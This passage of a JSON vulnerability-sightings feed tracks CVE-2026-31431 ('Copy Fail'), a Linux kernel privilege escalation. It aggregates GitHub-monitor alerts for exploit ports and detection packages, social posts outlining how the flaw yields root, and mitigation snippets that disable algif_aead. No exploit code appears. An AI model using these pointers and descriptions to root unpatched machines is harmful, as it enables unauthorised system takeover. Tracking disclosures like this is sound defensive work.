(CVE-2026-31431)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-29T23:00:04.000000Z"}, {"uuid": "c17c6369-45bc-4f4d-8704-f62e569d0c80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82122", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-c\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a tgies\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 1\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 00:58:23\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCross-platform C port of the Copy Fail Linux LPE (CVE-2026-31431). Disclosed 2026-04-29 by Theori / Xint.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T01:00:04.000000Z"}, {"uuid": "1c45c48e-e078-415d-9425-bb55e7135c59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82145", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431-detection\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a thrandomv\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 04:56:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nDefensive detection package for CVE-2026-31431 (Linux kernel AF_ALG LPE). Sigma, Falco, auditd, KQL, and EQL rules mapped to MITRE ATT&CK T1068/T1611. Includes detection logic designed for auditd, eBPF, and EDR telemetry pipelines.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T05:00:04.000000Z"}, {"uuid": "9a0db283-3a10-47ac-a02e-bcadb26c41a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82150", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-CVE-2026-31431-C\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a bigwario\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 05:59:28\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T06:00:04.000000Z"}, {"uuid": "0ab5c407-e4a6-40ae-94ea-56e48dbf82a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Earl.mast.john1126.com.ap.brid.gy/post/3mkqu6zohemi2", "content": "For testing the Linux vulnerability (recently disclosed as \"Copy Fail CVE-2026-31431\"), I booted my notebook computer up with a live DVD, so the exploit I am testing should not get saved to the machine.\n\nWill Linux Mint 21.2 succumb to the exploit?\n\nMy [\u2026] \n\n[Original post on mast.john1126.com]", "creation_timestamp": "2026-05-01T00:26:01.042822Z"}, {"uuid": "4e6e8108-94bd-4c88-bb34-e0775a58672c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newstecnicas.info.ve/post/3mkquvrlo2k22", "content": "\ud83d\udc27 \u00bfC\u00f3mo funciona 'Copy Fail'? El exploit de 732 bytes que otorga acceso Root en Linux (CVE-2026-31431) (+MITIGACI\u00d3N) www.newstecnicas.info.ve/2026/04/copy...", "creation_timestamp": "2026-05-01T00:32:38.332529Z"}, {"uuid": "8eda1d47-1176-417e-aae8-5cd37d936fc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nodo.kahanamura.com/post/3mkqv5cflvk2i", "content": "The exploit affects *ALL DISTRIBUTIONS THAT HAVE NOT BEEN PATCHED FOR CVE-2026-31431*. \n\nI've patched my systems temporarily by disabling AEAD whilst I wait for Arch to push a new kernel if they've not done so already.\n\nYou can do so with the command in the following post:\n(RUN THIS AS ROOT!)", "creation_timestamp": "2026-05-01T00:36:47.075003Z"}, {"uuid": "aedd6891-01db-4430-b51f-9d531ef2ee00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nodo.kahanamura.com/post/3mkqv5cufjs2i", "content": "The exploit affects *ALL DISTRIBUTIONS THAT HAVE NOT BEEN PATCHED FOR CVE-2026-31431*. \n\nI've patched my systems temporarily by disabling AEAD whilst I wait for Arch to push a new kernel if they've not done so already.\n\nYou can do so with the command in the following post:\n(RUN THIS AS ROOT!)", "creation_timestamp": "2026-05-01T00:36:47.607630Z"}, {"uuid": "20222636-ae0e-4bde-ba18-b3369ac908e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nodo.kahanamura.com/post/3mkqv5cufjt2i", "content": "The exploit affects *ALL DISTRIBUTIONS THAT HAVE NOT BEEN PATCHED FOR CVE-2026-31431*. \n\nI've patched my systems temporarily by disabling AEAD whilst I wait for Arch to push a new kernel if they've not done so already.\n\nYou can do so with the command in the following post:\n(RUN THIS AS ROOT!)", "creation_timestamp": "2026-05-01T00:36:48.131812Z"}, {"uuid": "e9469974-3d5c-4972-b5bc-2a5ba0c41074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mkqvmsmyhv2q", "content": "CVE-2026-31431 "Copy Fail" is a Linux kernel flaw allowing local users to gain root by corrupting page cache of setuid binaries via algif_aead. Patches released in kernels 7.0, 6.19.12, and 6.18.22. #LinuxKernel #PrivilegeEscalation #USA", "creation_timestamp": "2026-05-01T00:45:27.748543Z"}, {"uuid": "87d885da-c23d-49ec-9802-215f2f2b05c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82246", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a sngrotesque\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 23:59:59\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nThe code after complete confusion.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T00:00:05.000000Z"}, {"uuid": "fa5ea75f-85e7-4f8a-be37-ba682d0407e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkr7dz3x5f2v", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-01T03:39:28.427916Z"}, {"uuid": "7d072864-a4ed-448e-a4a2-db43598519d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82264", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a alg_check\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a professional-slacker\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 02:59:08\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T03:00:04.000000Z"}, {"uuid": "96f015e7-8ca5-421a-951e-966f85cc6489", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/chezo.uno/post/3mkrbprxbz22q", "content": "WSL2\u3067Copy fail\u8abf\u3079\u305f\u3089\u3001\u3059\u3067\u306bdisable\u3055\u308c\u3066\u305f\u3063\u307d\u3044\n\n```\n\u276f grep -r algif_aead /etc/modprobe.d/\n\n/etc/modprobe.d/disable-algif_aead.conf:# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)\n/etc/modprobe.d/disable-algif_aead.conf:install algif_aead /bin/false\n```", "creation_timestamp": "2026-05-01T04:21:49.168761Z"}, {"uuid": "3511dbc7-dfe1-44c5-a694-d7f251aba00f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3mkrdnwj4aa2j", "content": "The latest update for #Mendit includes \"CVE-2026-31431 (Copy Fail): #Linux Kernel LPE\" and \"Shai-Hulud Strikes #SAP: Supply Chain Worm Weaponized Claude Code to Compromise the CAP Framework\".\n \n#CyberSecurity #DevOps #OpenSource #Compliance https://opsmtrs.com/3zEYo7d", "creation_timestamp": "2026-05-01T04:56:36.577918Z"}, {"uuid": "bac6b8fc-55b5-4d54-b8b2-575228c88c8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mkrepvc7gcvh", "content": "Copy Fail\uff1a9\u5e74\u9593\u898b\u904e\u3054\u3055\u308c\u3066\u3044\u305fLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3082\u516c\u958b\uff08CVE-2026-31431\uff09 | Codebook\uff5cSecurity News https://codebook.machinarecord.com/threatreport/silobreaker-cyber-alert/45427/", "creation_timestamp": "2026-05-01T05:16:00.011645Z"}, {"uuid": "fd32a886-8687-4420-80c2-e3f94202e445", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/xchatter.techmeme.com/post/3mkrfp7ww3x2y", "content": "This tweet appeared under this Techmeme headline:\n\n@vxunderground:\n\nCVE-2026-31431 a/k/a CopyFail > Linux LPE > Description sounds like AI slop > Exploit is legit > Impacts every Linux kernel from 2017 - Now > Proof-of-concept released > It's Wednesday? https://copy.fail/", "creation_timestamp": "2026-05-01T05:33:08.096051Z"}, {"uuid": "4199a5fb-829d-4d30-b3f8-491524113989", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/xchatter.techmeme.com/post/3mkrfrerlqi24", "content": "This tweet appeared under this Techmeme headline:\n\nBrian Pak / @brian_pak:\n\nTime to talk about this one. CopyFail (CVE-2026-31431) -- a 732-byte Python script that roots every Linux distro shipped since 2017. \ud83e\uddf5", "creation_timestamp": "2026-05-01T05:34:19.607417Z"}, {"uuid": "e1996a4e-717a-48ce-966e-eaf40f2433e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82283", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail-briefing\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jodonnel\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a HTML\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 04:59:26\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 (Copy Fail) \u2014 Security briefings and remediation comparison\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T05:00:04.000000Z"}, {"uuid": "e11456ba-4a17-4e57-abac-0dbb87c68843", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/bontchev.infosec.exchange.ap.brid.gy/post/3mkrid6wtl2d2", "content": "CopyFail implementation in Rust:\n\nhttps://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail", "creation_timestamp": "2026-05-01T06:24:59.058032Z"}, {"uuid": "c46a49ed-d617-4de7-bb5c-1e7cf3705061", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/lemagit.bsky.social/post/3mkrin4qd3l23", "content": "CVE-2026-31431 : \u00c9vasion de privil\u00e8ges noyau Linux. \ud83d\udc27 Ce n'est pas juste un bug, c'est une porte vers le root sur votre cluster. Comprenez la m\u00e9canique et les d\u00e9fenses imm\u00e9diates avant l'exploitation. [Lien] [lire]", "creation_timestamp": "2026-05-01T06:25:38.472365Z"}, {"uuid": "35321f35-ea7f-4375-9e7a-a1557aa3b89e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/bryanseah234.bsky.social/post/3mkriodz4nk2d", "content": "I'm currently watching \"This Linux exploit is quite powerful (CopyFail - CVE-2026-31431)\"\n https://www.youtube.com/watch/cIM_wCS3axw", "creation_timestamp": "2026-05-01T06:26:19.450924Z"}, {"uuid": "df85db3c-cc0c-4f4f-b47f-2c02c30844c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkriud27n22j", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-01T06:29:39.667796Z"}, {"uuid": "3ccfb247-afd3-4d04-a4cf-726cc2912986", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/feistel.sns.feistel.party.ap.brid.gy/post/3mkqwz547yc72", "content": "#CopyFail #cve_2026_31431 I wrote about denying containers access to AF_ALG sockets with SELinux\nhttps://blog.feistel.party/2026/04/30/deny-alg-socket-to-containers-with-selinux-to-mitigate-cve-2026-31431.html", "creation_timestamp": "2026-05-01T01:15:11.095323Z"}, {"uuid": "e4a0a872-5b87-42eb-b38b-9570564bcfe0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/yabuki.bsky.social/post/3mkr2ajwbxa25", "content": "Debian\u3067\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3fix\u3057\u305f\u30ab\u30fc\u30cd\u30eb\u304c\u964d\u308a\u3066\u304d\u3066\u3044\u308b\u306e\u3067\u3001\u5404\u81ea\u5bfe\u5fdc\u3092\u304a\u9858\u3044\u3057\u307e\u3059\u3002\u308f\u305f\u3057\u306f\u5bfe\u5fdc\u3057\u307e\u3057\u305f\u3002\n\nCVE-2026-31431\nsecurity-tracker.debian.org/tracker/CVE-...", "creation_timestamp": "2026-05-01T02:08:06.612667Z"}, {"uuid": "6c3ff9ed-6fef-40b6-aaf0-60aa7f4ff347", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116491233168370853", "content": "Some increased actor activities are shown targeting Linux Kernel (CVE-2026-31431) https://vuldb.com/vuln/358784/cti", "creation_timestamp": "2026-04-30T02:12:35.398337Z"}, {"uuid": "1a19d7a2-b2fb-449b-92ea-7eef04f0d11d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3mkr2zq7oej24", "content": "\u201cCopy Fail\u201d Linux Zero-Day CVE-2026-31431 Sparks Panic Over Root-Level Takeover Claims Across Major\u00a0Systems\n\nIntroduction: A Quiet Linux Flaw Turning Into a Loud Underground Alarm A newly discussed Linux vulnerability tracked as CVE-2026-31431, also referred to in underground forums as \u201cCopy Fail,\u201d\u2026", "creation_timestamp": "2026-05-01T02:22:09.781681Z"}, {"uuid": "ccdc779d-3acf-445a-80e1-70ec46039883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mkr2taj5rie2", "content": "CVE-2026-31431 (Copy Fail): Linux Kernel LPE Article URL: https://securityboulevard.com/2026/04/cve-2026-31431-copy-fail-linux-kernel-lpe/ Comments URL: https://news.ycombinator.com/item?id=4797035...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-01T02:28:51.008640Z"}, {"uuid": "1d9bd093-42aa-4fef-af1e-94da1095abe3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mkr3im64kw25", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 213 interactions\nCVE-2026-3854: 53 interactions\nCVE-2026-41940: 32 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-31431: 160 interactions\nCVE-2026-41940: 31 interactions\nCVE-2025-31431: 29 interactions\n", "creation_timestamp": "2026-05-01T02:30:27.803104Z"}, {"uuid": "3ab6b46c-0ad6-4737-9c84-6eed5db9a6e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mkr3i6agi2vh", "content": "Copy Fail \u2014 CVE-2026-31431 https://copy.fail/", "creation_timestamp": "2026-05-01T02:30:37.091398Z"}, {"uuid": "6fbf8982-2fdd-4dba-b03f-6651974987cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116496993374350234", "content": "As mentioned earlier in this thread, the su corruption route was only one possible strategy to be used by this exploit.\nHere's another variant of the exploit that doesn't have to rely on such things to achieve its goal.\nFor example, the simple escalate argument simply removes the password requirement for su'ing to root.  There are other payloads also possible.\nSuch exploits will not have process 'su' launched '/bin/sh IOCs in the syslogs.  Perhaps all that is relevant is the alg: No test for authencesn(hmac(sha256),cbc(aes)) (authencesn(hmac-sha256-lib,cbc-aes-aesni)) part.  But there's no evidence of what was done.", "creation_timestamp": "2026-05-01T02:37:38.256314Z"}, {"uuid": "e81074ba-2195-4615-aa79-af5a821683e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82287", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a nisec-eric\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 05:53:22\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nAI for Work. handy to test\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T06:00:06.000000Z"}, {"uuid": "57c13bd3-44b1-4836-8cd3-3da301f7899f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mkrldampucvh", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f https://zenn.dev/aeyesec/articles/7e4a1e3c83e81b", "creation_timestamp": "2026-05-01T07:14:13.614645Z"}, {"uuid": "98a87de4-a6f6-427b-8915-bc6988578734", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mkrlny5pyk2m", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f\nhttps://share.google/Tl72kRvZHdSMkUUv0", "creation_timestamp": "2026-05-01T07:19:48.238109Z"}, {"uuid": "48092243-63b1-4f2a-9e10-3e7ff2d22923", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3mkrlweuggkvh", "content": "Linux\u306e\u8106\u5f31\u6027\u5bfe\u7b56\u306b\u3064\u3044\u3066(CVE-2026-31431\u3001Copy Fail) | \u60c5\u5831\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3 | IPA \u72ec\u7acb\u884c\u653f\u6cd5\u4eba \u60c5\u5831\u51e6\u7406\u63a8\u9032\u6a5f\u69cb https://www.ipa.go.jp/security/security-alert/2026/alert20260501.html", "creation_timestamp": "2026-05-01T07:24:54.081525Z"}, {"uuid": "05d59cfc-d800-4cdd-a95a-ee5c532bd323", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kompetenztraining.bsky.social/post/3mkrm3hvytv2n", "content": "CVE-2026-31431: Logikfehler im Linux-Kernel-Crypto-Subsystem (algif_aead), seit 2017 unentdeckt in allen gro\u00dfen Distros. 732 Byte Python gen\u00fcgen f\u00fcr root \u2014 best\u00e4tigt auf Ubuntu, RHEL, Amazon Linux, SUSE. CVSS 7.8. Benutzt hier jemand Linux? Dann bitte jetzt patchen.", "creation_timestamp": "2026-05-01T07:27:20.750428Z"}, {"uuid": "6e599f43-d0fa-4445-8c95-3b05d0cc4cbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mks4ex5hqoo2", "content": "Linux distributions worldwide targeted by the Copy Fail exploit An exploit for the \u201cCopy Fail\u201d security vulnerability (CVE-2026-31431) in the Linux kernel has been made public. The vulnerabilit...\n\n#Security #Copy #Fail #CVE-2026-31431 #Dirty #Pipe #Linux #linux [\u2026] \n\n[Original post on techzine.eu]", "creation_timestamp": "2026-05-01T12:19:02.782829Z"}, {"uuid": "77a1f247-0b46-4f5c-9321-7786b0eb40f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/arnoldmelm.bsky.social/post/3mks544kkz224", "content": "Eine neu entdeckte #Linux-Sicherheitsl\u00fccke namens #CopyFail (CVE-2026-31431) sorgt f\u00fcr Besorgnis. Ein Fehler im Linux-Kernel, der seit 2017 unentdeckt ist, erm\u00f6glicht es normalen Benutzern, mit einem winzigen Skript vollen Root-Zugriff zu erlangen. \n#Linux\nyoutu.be/_bckyC6w9f4?...", "creation_timestamp": "2026-05-01T12:31:56.020253Z"}, {"uuid": "4033bd31-eae7-4fd9-9bb8-6bda5ca284d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/cybercod.bsky.social/post/3mks5jmwj2f2l", "content": "Solid fix for CVE-2026-31431! Blacklisting `algif_aead` via kernel arg with Ansible is a clean, idempotent approach. Great use of Linux fundamentals!", "creation_timestamp": "2026-05-01T12:39:29.340002Z"}, {"uuid": 